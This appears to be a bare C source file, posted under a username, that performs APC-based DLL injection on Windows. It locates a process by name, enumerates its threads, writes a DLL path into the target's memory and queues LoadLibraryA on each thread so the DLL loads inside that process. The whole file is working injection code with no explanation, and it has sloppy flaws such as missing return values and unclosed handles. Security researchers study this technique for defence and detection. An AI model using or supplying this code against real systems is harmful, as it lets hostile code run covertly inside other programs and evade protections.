Young87

#include <windows.h>

#include <tlhelp32.h>

#include <stdio.h>

DWORD GetProcessIdByName(char *pszProcessName) {

HANDLE hSnap = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);

PROCESSENTRY32 ProcesEntry = {sizeof(ProcesEntry)};

BOOL bRet = Process32First(hSnap, &ProcesEntry);

while (bRet) {

if (strcmpi(ProcesEntry.szExeFile, pszProcessName) == 0) {

return ProcesEntry.th32ProcessID;

}

bRet = Process32Next(hSnap, &ProcesEntry);

}

}

BOOL GetAllThreadId(DWORD ProcessId,DWORD **ppThreadId,DWORD *LengthThread){

HANDLE hSnap=CreateToolhelp32Snapshot(TH32CS_SNAPTHREAD, 0);

THREADENTRY32 ThreadEntry={sizeof(ThreadEntry)};

BOOL bRet=Thread32First(hSnap, &ThreadEntry);

DWORD *pThreadId =malloc(sizeof(DWORD)*1024);

int count=0;

while(bRet){

if(ThreadEntry.th32OwnerProcessID==ProcessId){

pThreadId[count]=ThreadEntry.th32ThreadID;

count++;

}

bRet=Thread32Next(hSnap, &ThreadEntry);

}

*ppThreadId=pThreadId;

*LengthThread=count;

}

BOOL DllInject(char *pszProcessName,char *pszDllName){

DWORD ProcessId=GetProcessIdByName(pszProcessName);

DWORD *pThreadId=NULL;

DWORD LengthThread=0;

GetAllThreadId(ProcessId, &pThreadId, &LengthThread);

HANDLE hProcess=OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcessId);

LPVOID lDllAdr=VirtualAllocEx(hProcess, NULL, strlen(pszDllName)+1, MEM_COMMIT|MEM_RESERVE, PAGE_EXECUTE_READWRITE);

WriteProcessMemory(hProcess, lDllAdr, pszDllName, strlen(pszDllName)+1, 0);

FARPROC pLoadLibraryA=GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");

HANDLE hThread;

for(int i=0;i<LengthThread;i++){

hThread=OpenThread(THREAD_ALL_ACCESS, FALSE, pThreadId[i]);

QueueUserAPC((PAPCFUNC)pLoadLibraryA, hThread,(ULONG_PTR) lDllAdr);

}

}

int main(){

DllInject("code.exe", "C:\\Users\\beini\\Desktop\\work\\test.dll");

return 0;

}